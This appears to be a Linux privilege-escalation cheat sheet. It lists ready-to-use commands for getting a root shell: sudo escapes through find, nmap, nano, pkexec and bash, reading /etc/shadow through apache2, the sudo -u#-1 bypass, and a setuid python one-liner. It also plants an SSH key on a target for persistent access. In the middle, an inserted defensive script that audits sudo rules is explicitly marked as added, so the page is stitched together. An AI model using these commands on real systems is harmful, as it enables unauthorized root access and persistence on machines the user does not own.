😄 CHEAT SHEET

PRIVILEGE ESCALATION CHEAT SHEET

Privilege escalation is the step of gaining illicit access to elevated rights, or privileges beyond those a user is entitled to. The attack is performed to gain unauthorized access to the system (root). It exploits human behavior, design flaws, or oversights in the operating system. It is also known as lateral movement in the attack chain.

Cheat Sheet

sudo -l

sudo find /bin -name nano -exec /bin/sh \;

echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse

sudo apache2 -f /etc/shadow

sudo su root or /bin/bash -p

nano >> CTRL+R >> CTRL+X >> reset; sh 1>&0 2>&0

sudo pkexec /bin/sh
(ALL, !root) /bin/bash
sudo -u#-1 /bin/bash
If apache2 is found in sudo -l:
sudo apache2 -f /etc/shadow
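
For the defensive side of the sudo entries above, this added example (not part of the original page) parses text in `sudo -l` output format and flags rules that allow the binaries listed in this section or that use the `!root` run-as form. The sample output, the user and host names, and the `audit_sudo_rules` helper are constructed for illustration.

```python
import re

# Binaries this cheat sheet runs through sudo to get a shell or read protected files.
RISKY_BINARIES = {"find", "nmap", "nano", "apache2", "pkexec", "su", "bash", "sh"}

# A rule line in `sudo -l` output: "(runas) [TAG: ...] command[, command ...]"
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.*)$")

# Constructed sample of `sudo -l` output (user and host names are made up).
SAMPLE = """\
Matching Defaults entries for alice on host1:
    env_reset, mail_badpass

User alice may run the following commands on host1:
    (root) NOPASSWD: /usr/bin/find
    (ALL, !root) /bin/bash
    (root) /usr/sbin/service nginx reload, /usr/sbin/apache2
"""


def audit_sudo_rules(sudo_l_output):
    """Return (reason, rule) findings for text in `sudo -l` output format."""
    findings = []
    for line in sudo_l_output.splitlines():
        match = RULE_RE.match(line)
        if not match:
            continue  # headers, Defaults entries, blank lines
        runas, _tags, commands = match.groups()
        rule = line.strip()
        # Run-as users come before an optional ":group" part.
        users = [u.strip() for u in runas.split(":")[0].split(",")]
        # "ALL, !root" is the rule form the "#-1" user-ID line above is aimed at.
        if "ALL" in users and "!root" in users:
            findings.append(("run-as list excludes root only by negation", rule))
        for command in commands.split(","):
            parts = command.split()
            if not parts:
                continue
            name = parts[0].rsplit("/", 1)[-1]
            if parts[0] == "ALL":
                findings.append(("any command allowed", rule))
            elif name in RISKY_BINARIES:
                findings.append((f"{name} can be run through sudo", rule))
    return findings


if __name__ == "__main__":
    for reason, rule in audit_sudo_rules(SAMPLE):
        print(f"[!] {reason}: {rule}")
```

Feed it the saved output of `sudo -l -U <user>` for each account under review; rules it does not flag still need a manual look, since the binary list only covers this page.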

Docker

www-data / no sudo (stable connection)

python -c 'import pty; pty.spawn("/bin/bash")'

Find specific file

find / -name '*.txt' 2>/dev/null

Generate SSH key.

Our machine: $ ssh-keygen -f mykey
Target machine: $ echo "<mykey.pub>" > ~/.ssh/authorized_keys
chmod 600 mykey (restrict the private key file to its owner)
ssh -i mykey <targetusername>@remoteIP

SUID

find / -perm -u=s -type f 2>/dev/null
getcap -r / 2>/dev/null

For a getcap vuln:

/usr/bin/python2.6 -c 'import os;os.setuid(0);os.system("/bin/bash")'

Crontab

cat /etc/crontab
